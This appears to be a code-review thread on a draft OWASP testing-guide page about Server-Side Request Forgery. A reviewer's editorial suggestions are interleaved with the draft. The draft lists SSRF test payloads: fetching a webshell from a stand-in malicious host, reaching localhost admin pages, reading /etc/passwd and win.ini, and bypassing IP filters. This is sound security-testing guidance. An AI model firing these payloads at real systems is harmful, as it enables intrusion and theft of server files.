SSRF Testing (#633)
OWASP/wstg: Testing_for_Server-Side_Request_Forgery.md

## Summary

> Often web applications may have to interact with internal or external resources in order to provide a certain functionality, with the expectation tha only the service providing that functionality will be used, but often such functionality processes user data and if not handled properly it can open the door for certain injection attacks that we call SSRF. A successful SSRF attack can grant the attacker access to restricted actions, internal services, internal files within the application or the organization. In some cases it can even lead to RCE.

Reviewer: ```suggestion
Often web applications may have to interact with internal or external resources in order to provide certain functionality, with the expectation that only the service providing that functionality will be used, but often such functionality processes user data and if not handled properly it can open the door for injection attacks that are called Server-side Request Forgery (SSRF). A successful SSRF attack can grant the attacker access to restricted actions, internal services, or internal files within the application or the organization. In some cases it can even lead to Remote Code Execution (RCE).
```

Some of the main mitigation techniques include IP whitelisting and URL filtering. You can find out more on the

> [OWASP Server Side Request Forgery Prevention Cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)

Reviewer: This should be moved to a remediation section.

https://github.com/OWASP/wstg/blob/master/template/999-Foo_Testing/2-Template_Explanation.md#remediation

## Test Objectives

- Identify injection points (External resource calls, API calls)
- Test if the SSRF is exploitable
- Asses the severity of the vulnerability

## How to Test

When testing for SSRF we are trying to trick the server into loading/writing unintended content. The most common test is for local and remote file inclusion, but there is another facet to SSRF, a trust relationship that often arises with server-side request forgery where the application server is able to interact with other back-end systems that are not directly reachable by users. These systems often have non-routable private IP addresses or are restricted to certain hosts. Since they are protected by the network topology, they often lack more sophisticated controls.

Such internal systems often contain sensitive data or functionality.

If we have the following request:

```bash
GET /page HTTP/1.0
Content-Type: application/x-www-form-urlencoded

page=about.php

> ```

Reviewer: These example requests don't make sense. They all purport to be GET requests but then list `application/x-www-form-urlencoded` as a POST then show a body payload like a POST, but don't have the payload properly encoded.

Also they should use the highlighting hint `http` or `html` not `bash`.

If they really are GETs, I'd suggest listing it inline like: 
```md
If we have the following request: `https://example.com/page?page=about.php`, we can try the following payloads.
```

We can try the following payloads:

Return the content of an external resource like a webshell.

```bash
GET /page HTTP/1.0
Content-Type: application/x-www-form-urlencoded

page=https://malicioussite.com/shell.php
```

> Use the localhost/loopback interface to access content restricted to the host only. This mechanism implies that if you have access to the host than you have enough privileges to directly access the `admin` page.

Reviewer: ```suggestion
Use the localhost/loopback interface to access content restricted to the host only. This mechanism implies that if you have access to the host then you have enough privileges to directly access the `admin` page.
```

> These kind of trust relationships, where requests originating from the local machine are handled differently than ordinary requests, is often what makes SSRF into a critical vulnerability.

Reviewer: ```suggestion
These kind of trust relationships, where requests originating from the local machine are handled differently than ordinary requests, are often what makes SSRF into a critical vulnerability.
```

```bash
GET /page HTTP/1.0
Content-Type: application/x-www-form-urlencoded

page=http://localhost/admin  #Alternative http://127.0.0.1/admin
```

Fetch a local file

```bash
GET /page HTTP/1.0
Content-Type: application/x-www-form-urlencoded

page=file:///etc/passwd
```

> All of the examples above apply to POST requests, they can also be injected into headers if the header data is used in such a way.

Reviewer: ```suggestion
All of the payloads above can apply to any type of HTTP request, and could also be injected into header and cookie values as well.
```

> One important note on SSRF with post requests is that the SSRF might turn into a Blind SSRF, because the application might not return anything, but anyway that data might be used in another functionality like PDF reports for example.

Reviewer: ```suggestion
One important note on SSRF with POST requests is that the SSRF may also manifest in a Blind manner, because the application might not return anything immediately, that data might be used in other functionality such as PDF reports, invoice/order handling, etc. which are visible to employees/staff but not necessarily the end user or tester.
```

<iframe src="file:///c:/windows/win.ini" width="400" height=”400">
```

> ### Common filter bypass

Reviewer: ```suggestion
### Common Filter Bypass
```

Some applications block references to `localhost` and `127.0.0.1`, this can be circumvented by:

> - Using alternative IP representation such as such as 2130706433, 017700000001, or 127.1 which evaluated to 127.0.0.1
> - String obfuscation
> - Registering your own domain that resolves to 127.0.0.1

Reviewer: ```suggestion
- Using alternative IP representation such as such as 2130706433, 017700000001, or 127.1 which evaluate to 127.0.0.1
- String obfuscation
- Registering a public domain that resolves to 127.0.0.1
```
